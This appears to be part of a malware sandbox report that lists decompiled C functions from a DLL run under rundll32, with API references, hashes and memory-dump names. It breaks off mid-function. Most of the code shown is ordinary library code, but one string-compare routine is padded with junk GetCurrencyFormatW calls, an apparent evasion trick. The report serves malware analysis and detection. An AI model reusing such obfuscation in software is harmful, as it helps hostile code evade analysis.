Hola Mundo, xrefs: 10004CE9, 10004CEE, 10004CFB

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MenuMessageSend$Append$System
String ID: Hola$Hola Mundo
API String ID: 1041970973-3638179569
Opcode ID: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
Instruction ID: b3705290631e1be327c95a3509f9ae24e9e58cb89a542e4eda3f4c22a02a2666
Opcode Fuzzy Hash: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
Instruction Fuzzy Hash: 4521E571600744BFE711DB20CC82F6BB7A9FB49B90F004A29F255A61E1DB36BD04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10012309 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10012309(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10045580; // 0x2ef01728
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1001FBB5(E100121BA(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 1001232F
GetStockObject.GDI32(0000000D), ref: 10012337
GetObjectA.GDI32(00000000,0000003C,?), ref: 10012344
GetDC.USER32(00000000), ref: 10012353
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10012367
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10012373
ReleaseDC.USER32 ref: 1001237F

Strings

System, xrefs: 1001232A, 10012394

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
Instruction ID: 49ddb338abe5c97598327bd9655a3bb67b407c313b2becf61478e8986669c503
Opcode Fuzzy Hash: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
Instruction Fuzzy Hash: 9B1182B1600328AFEB14DBA0CC89FAE77B8EB49781F014015F601EE1D1DB749E418B60

Uniqueness

Uniqueness Score: -1.00%

Function 1001D204 Relevance: 13.8, APIs: 9, Instructions: 253
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E1001D204(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E1001FC63(E100348FF, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E1000EC55(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_push( *(_t191 + 8) << 4);
					_t127 = E100010EE(_t173, _t185, _t187, _t191, __eflags);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E100203C0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E10020F40(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E1001C9FD(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_push(_t49);
						_t135 = E100010EE(_t173, _t185, _t187, _t49, __eflags);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E1001FCBF(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E1000E519();
							goto L7;
						}
						E100203C0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x10038ec0;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E1001CF1C(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E1001CDAE(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E1001CE04(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E1000E519();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M1001D514))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E1001CE04(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E1000E519();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E1001E78B();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E1001E78B();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E1001E78B();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E1001E78B();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				_push(_t19);
				if(E100010EE(_t173, _t185, _t19, _t190, _t201) != 0) {
					E100203C0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E10005007(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 1001D20B
lstrlenA.KERNEL32(00000000,000000FF,00000050,10012995,00000000,00000001,?,?,000000FF,?,?,?), ref: 1001D23D
__alloca_probe_16.LIBCMT ref: 1001D286

Part of subcall function 10005007: _memcpy_s.LIBCMT ref: 10005017

__alloca_probe_16.LIBCMT ref: 1001D2FD
_memset.LIBCMT ref: 1001D30D
__alloca_probe_16.LIBCMT ref: 1001D336
VariantClear.OLEAUT32(?), ref: 1001D3EC

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 2586305615-0
Opcode ID: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
Instruction ID: 6804580c6d9db2e853958beb5b9c70fac7fcc155cdbb3eab0184ec39f158d97d
Opcode Fuzzy Hash: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
Instruction Fuzzy Hash: 2EA1AE35C00649DBDF11EFE4C885AAEBBB1FF04354F20415AE825AB291D774EE81DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10010915 Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10010915(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E1001FBF7(E10033B54, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					LeaveCriticalSection(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E100105C8(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x100384d0;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E100106E4( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100010C9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100010C9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E10004E3A(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E10020F40(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					LeaveCriticalSection( *(_t66 - 0x14));
				}
				return E1001FC9C(_t36);
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1001091C
EnterCriticalSection.KERNEL32(?,00000010,10010ACA,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001092D
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 1001094B
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 1001097F
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB
_memset.LIBCMT ref: 10010A0A
TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
Instruction ID: c7db6ee6c4a6de8547c75bf432caa67de510ee99b88e2ce085b1988c099b2997
Opcode Fuzzy Hash: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
Instruction Fuzzy Hash: 5431BC70600606AFE721DF10CC95C5ABBB5FF04350B61C52AF9869F562CBB1ED90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10001395 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001395(signed short* _a4, signed short* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _t31;
				void* _t34;
				signed int _t36;
				short* _t56;
				short* _t76;

				_t31 = E10001380(_a4);
				if(_t31 == E10001380(_a8)) {
					_v4 = _v4 & 0x00000000;
					if(E10001380(_a4) <= 0) {
						L12:
						_t34 = 0;
						L13:
						return _t34;
					}
					_t76 = L"xadqsavcbdfewescGADW";
					_t56 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t36 =  *_a4 & 0x0000ffff;
						_v8 = _t36;
						_v12 =  *_a8 & 0x0000ffff;
						if(_t36 >= 0x41 && (_v8 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440dc + 0x5a) {
							_v8 = _v8 + GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20;
						}
						if(_v12 >= 0x41 && (_v12 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x5a) {
							_t19 = GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20; // 0x61
							_v12 = _v12 + _t19;
						}
						if(_v8 != _v12) {
							break;
						}
						_a4 =  &(_a4[1]);
						_v4 = _v4 + 1;
						_a8 =  &(_a8[1]);
						if(_v4 < E10001380(_a4)) {
							continue;
						}
						goto L12;
					}
					_t34 = 1;
					goto L13;
				}
				return 1;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001412
GetCurrencyFormatW.KERNEL32 ref: 10001433
GetCurrencyFormatW.KERNEL32 ref: 1000145C
GetCurrencyFormatW.KERNEL32 ref: 1000147D

Strings

xadqsavcbdfewescGADW, xrefs: 100013DB, 1000140B, 1000142C, 10001455, 10001476
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100013E0, 1000140E, 1000142F, 10001458, 10001479
A, xrefs: 10001448

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: A$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-1548561649
Opcode ID: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
Instruction ID: 41e55657c6f233ddb2d2aa4512fb1aa83921a4b3024967986a1fac65e9f116a1
Opcode Fuzzy Hash: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
Instruction Fuzzy Hash: 8B31E434608346AFE704DF51DC81F6BBBE8FB85789F10481EFA84961D0E7B49948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10016311 Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E10016311(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E1001FBC4(E100340BB, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E10014BD2(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x1003b26c, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E1001FC9C(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
